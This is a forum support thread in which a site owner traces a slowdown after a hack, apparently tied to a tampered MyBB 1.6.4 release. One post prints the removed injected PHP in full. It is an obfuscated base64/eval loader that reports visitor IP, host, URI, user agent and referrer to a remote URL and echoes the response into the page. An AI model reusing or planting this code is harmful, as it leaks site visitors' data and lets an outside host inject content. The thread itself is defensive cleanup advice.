Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Forum speed/hack problem

Basically my forum had a warning threat which popped up when you went onto it Confused after some research we found out over 3,000,000 sites were effected. My problem now is fixing this as there is some code somwhere in the index which is lagging the site so much.

Going onto the forum is now fixed as there was some corrupt code removed. its just when you click a post it takes for ever Confused

Could anyone give me a heads up on how to fix this as i dont have any backups from before the site was hit?>

Kind regards
Hmm, only the showthread page seems to be affected. The rest of the site loads nicely. I don't see anything out of the ordinary in your source code that could be slowing down page loads, but I'd re-upload the showthread.php file from a fresh download just to be sure? Also, what does your debug info (at the bottom) say? And which plugins do you have installed?

I looked at the showthread html source and saw nothing out of the norm.. Post the showthread.php contents here maybe?
Ok i looked in the showthread file and found the same code that was causing the index page to lag:

?><?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

Code removed and all speedy once again.

Thanks for the reply guys
Glad you found the culprit. It appears as if this was part of the 1.6.4 exploit that was maliciously added by a third party after hacking MyBB's CMS.

FWIW: Check your config.php file for any malicious code. There are many that have said that there was code similar to what you just posted in config.php. Make sure to scroll all the way, as some have said that several blank lines were created to prevent the administrator from noticing it...

Hope this helps. If this helps with nothing, it is better to be safe than sorry.
PGP Key (Fingerprint: 23B6 F4C0 FE2D 45AA 61A0 1E86 DB87 09DC DD87 6E40)
No problems thanks for the headsup.

Forum Jump:

Users browsing this thread: 1 Guest(s)